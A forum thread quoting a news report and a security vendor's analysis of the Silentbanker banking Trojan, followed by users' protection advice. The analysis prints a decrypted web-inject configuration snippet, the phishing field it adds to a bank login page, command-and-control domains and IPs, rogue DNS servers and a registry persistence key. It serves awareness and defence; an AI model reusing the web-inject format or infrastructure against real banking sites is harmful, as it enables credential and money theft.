Nope, It's real.

Pooh Bear
===============
VANCOUVER - In what is being billed as one of the most sophisticated cyber attacks to hit the Internet, a virus has been released that gets between computer users and their banking websites, giving thieves free rein to drain accounts and wreak financial havoc on their victims.

Dubbed the "Silentbanker," the virus is a Trojan horse computer users may unknowingly download by simply browsing the Internet. The first sign it's at work may be a bank notification warning their client has been a victim of fraud.

More than 400 banks -- including some in Canada -- have been targeted worldwide by the virus, which operates in many languages, said Symantec, a global security company tracking the progress of the Trojan.

"I'd have to say it is one of the most sophisticated we have seen. What makes it more dangerous is it seems to be staffed by professional software developers," said Al Huger, vice-president for security response and security services at Symantec.

"They are writing this and maintaining it just like they would a piece of software you might buy. There is a lot of money on the line for them. It is certainly organized."

Unlike conventional cyber banking frauds -- in which bank clients are steered to a bogus website masquerading as their own institution's online site -- Silentbanker uses the genuine bank website and is able to manipulate the user's account without the client's knowledge.

Payments are steered into a hacker's account, or cleaned out altogether, before transactions can be encrypted.

It can also be used to steal credit card information and passwords.

When a banking client signs on to their banking website, the hacker is a silent third party, remaining completely hidden and making no changes at all to the site the banking client is seeing.

All the functions, from transferring funds to paying bills or checking credit card balances, remain the same and continue to work, thereby giving the user no cause to suspect they've been compromised.

"What they are doing is they are already on your computer, and when you type on your computer [the hackers] are sitting between your keyboard and the bank," said Huger. "They are intercepting everything you send to your bank and everything your bank sends to you.

"It is called a man-in-the-middle attack."

Huger said the current attack has been under way for about four days, and while he said Symantec has seen it try to infect thousands of its customers, the company's security software has stymied the attempts.

A Symantec security team member said the virus is not just targetting large American banks, but financial institutions around the world, particularly in Europe.

Computer users who don't have up-to-date anti-virus security software installed, or who haven't updated their web browser to fix flaws that are allowing the Trojan to proliferate, are particularly open to attack.

"[Silentbanker] sits on the website, and unbeknownst to you it downloads to your system," said Huger, who added the hackers behind Silentbanker are probably also trying to send the virus out via e-mail.

Huger said the download could originate from many legitimate websites.

"It is the complete gamut -- from gaming sites to porn sites to home-craft sites," he said. "Whoever is doing this is actually breaking into a lot of legitimate sites and placing it there."

Heres what the Symantic website had to say about this trojan
Targeting over 400 banks and having the ability to circumvent two-factor authentication are just two of the features that push Trojan.Silentbanker into the limelight. The scale and sophistication of this emerging banking Trojan is worrying, even for someone who sees banking Trojans on a daily basis.

This Trojan downloads a configuration file that contains the domain names of over 400 banks. Not only are the usual large American banks targeted but banks in many other countries are also targeted, including France, Spain, Ireland, the UK, Finland, Turkeythe list goes on.

The ability of this Trojan to perform man-in-the-middle attacks on valid transactions is what is most worrying. The Trojan can intercept transactions that require two-factor authentication. It can then silently change the user-entered destination bank account details to the attacker's account details instead. Of course the Trojan ensures that the user does not notice this change by presenting the user with the details they expect to see, while all the time sending the bank the attacker's details instead. Since the user doesnÂt notice anything wrong with the transaction, they will enter the second authentication password, in effect handing over their money to the attackers. The Trojan intercepts all of this traffic before it is encrypted, so even if the transaction takes place over SSL the attack is still valid. Unfortunately, we were unable to reproduce exactly such a transaction in the lab. However, through analysis of the Trojan's code it can be seen that this feature is available to the attackers.

The Trojan does not use this attack vector for all banks, however. It only uses this route when an easier route is not available. If a transaction can occur at the targeted bank using just a username and password then the Trojan will take that information, if a certificate is also required the Trojan can steal that too, if cookies are required the Trojan will steal those. In fact, even if the attacker is missing a piece of information to conduct a transaction, extra HTML can be added to the page to ask the user for that extra information. (In the example below the user is asked to enter their encryption key, in addition to the regular information.)

Here is the login form viewed on a clean machine:

(Insert Picture of a Regular Log In Screen)

Below the form presented to an infected user is shown, the input box added by the Trojan has been marked in red:

(Insert Picture of an Infected Log In Screen)

When instructed, the Trojan can also redirect users to an attacker-controlled server instead of the real bank in order to perform a classic man-in-the-middle attack. Currently there is only one bank targeted in this way; however, recent updates to the Trojan change the user's DNS settings to point to an attacker-controlled server. Using this technique the Trojan can start redirecting any site to an attacker site at any time. This feature could also mean that if the Trojan is removed but the DNS settings are left unchanged then the user may still be at risk. (See below for the attackers' DNS server addresses.)

Add to all of the above the ability to steal FTP, POP, Web mail, protected storage, and cached passwords and then we start to see the capabilities of this Trojan. But, it doesnÂt stop there  don't forget the porn! The Trojan also contains over 600 pornographic Web site URLs that can be shown to the infected user so that the attacker can make money from the referrals.

Lastly, the Trojan can also download updates, which it regularly does. It can also download other executables and it can use the infected machine as a proxy or as a Web server on any chosen port (in tests the http port used was 18102).

The multiple configuration files that the Trojan downloads are updated several times per day and currently the Trojan is capable of injecting HTML into about 200 different URLs. The configuration files are compressed and encrypted; however, after decrypting them we can see how the Trojan works in more detail.

The configuration files are structured as .ini files and each section of an .ini file represents a different task. Here is a snippet from the configuration file that was used to inject HTML into the banking form shown in the example above:

jhw21]
pok=insert
qas=someBankSite.com/xpage/loginxxxxxxxxxs.htm
njd=name="oppasswd;
dfr=14
xzn=/)n
xzq=2
rek=(div class="clear sep4")(/div)
(label for="clave")Clave de firma: (/label)
(input name="ESpass" type="password" size="8" maxlength="8"
class="input01 aleft w180"/)Â
req=166

The configuration options in the snippet above are as follows:

Token: Purpose:
pok Action to take
qas URL to take action on
njd String to search for
xzn End string to search for
rek HTML to insert

The Trojan searches for the string name="oppasswd; then it finds the end tag /) then it inserts the string into the page:

(div class="clear sep4")(/div)

(label for="clave")Clave de firma: (/label)

(input name="ESpass" type="password" size="8" maxlength="8"

class="input01 aleft w180"/)

Shown below is the HTML shown to the user on a non-infected computer:

(label for="clave")Clave personal: (/label)

(input id="clave" name="oppasswd" type="password" size="8" maxlength="8"

class="input01 aleft w180"/)

(/div)

And on an infected computer:

(label for="clave")Clave personal: (/label)

(input id="clave" name="oppasswd" type="password" size="8" maxlength="8"

class="input01 aleft w180"/)

(div class="clear sep4")(/div)

(label for="clave")Clave de firma: (/label)

(input name="ESpass" type="password" size="8" maxlength="8"

class="input01 aleft w180"/)

(/div)

Note: I substituted ) for > in the above examples.

The Trojan can take any of the following actions when altering the HTML of a page: insert, delete, replace, and replace all. The Trojan uses the keyword "ESpass" (see the form above) as a keyword when the user sends a page to the bank and the Trojan checks if the page contains that keyword. Using this technique the Trojan can recognize pages it has altered and can extract the relevant data from the page and send it to the attacker as well as to the bank.

The configuration files for this Trojan currently contain over 200kb of data; however, new URLs and HTML are being added to the configuration files on a daily basis. The Trojan is easily updated since the full HTML of any banking-related Web site is sent to the attackers. Using these submissions they can target banks for which they do not have bank accounts already. We are currently monitoring all of the updates to this Trojan.

The Trojan accesses the following URLs for configuration, updates, and to send stolen data:

 iloveie.info
 webcounterstat.info
 microcbs.com
 reservaza.com
 screensaversfor-fun.com
 mystabcounter.info
 85.255.119.218

The Trojan also downloads a copy of Trojan.Flush.J, which changes the users DNS settings to the following attacker settings:

 85.255.116.133
 85.255.112.87

For protection, please keep your antivirus definitions up to date and block the above addresses at the firewall.

Note: Not only did this Trojan grab my attention for obvious reasons, but the Trojan also installed itself as a .midi driver, causing my music to stop! For the record, the Trojan adds itself the following registry key so that it is loaded in all applications that use sound:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\"midi1

But it also said this:

Discovered: December 17, 2007
Updated: January 8, 2008 12:54:17 PM
Also Known As: Spy-Agent.cm [McAfee]
Type: Trojan
Infection Length: 54,189 bytes and 98,304 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP

Trojan.Silentbanker is a Trojan horse that records keystrokes, captures screen images, and steals confidential financial information to send to the remote attacker.

Protection
Initial Rapid Release version December 17, 2007 revision 023
Latest Rapid Release version January 10, 2008 revision 023
Initial Daily Certified version December 17, 2007 revision 032
Latest Daily Certified version January 15, 2008 revision 016
Initial Weekly Certified release date December 19, 2007
Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.

Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Moderate
Removal: Easy
Damage
Damage Level: Medium
Payload: Records keystrokes and captures screen images
Releases Confidential Info: Steals confidential financial information
Distribution
Distribution Level: Low

Thanks PoohBear - now, I have McAfee Security Center with auto updates. My PC auto installs anything from Microsoft. Every time I get off, I run CCleaner and I use AdAware SE, Spybot & SuperAntispyware Free at least every other day.

In the opinion of this forum - should I download & use Gmer?
I don't want to be too paranoid, either. Thanks again, Debbie.

You should be able to check the list of viruses
that MacAffee protects against. Just look for
a listing of Spy-Agent.cm and if it is listed
then you should be protected against it.

I have never used MacAffee so I can't advise
you as to how to check what it protects against.
But since they have named it, I would guess that
it is included in the antivirus definition database.

Pooh Bear

Always keep windows updated, always change your banking log-in information often, always use the most current browser available what ever one you use. And a 2 way firewall like zone alarm and others, don't simply rely on a router and the passwords on routers should be changed also. Always check and know the status of your accounts, IF you ever think you are at risk go to a clean computer & change your password on all accounts, go to a Malware removal forum and have the pc checked by people that specialize in this work.

A lot of back door trojans do this they enter the system and attempt to contact a site and send your info (banking) and that's why the 2 way fire wall is so important.

Removal of these type of trojans / rootkits can be difficult and even the experts suggest reinstalling the operating system after this type of infection. A rootkit works in conjunction with the virus or Trojan and is designed to hide from scanners. Unfortunately rootkits work well.

Keep the pc up to date, run a firewall, change you passwords, watch where you surf, run special on line scans from time to time

Whew !! Thanks everyone - I think I have it all covered but I am calling McAfee just to make sure I'm set up right & have a 2 way firewall. Pretty sure I do, though. Thanks again to all, Debbie.

I called my bank to make them aware of it, cant hurt.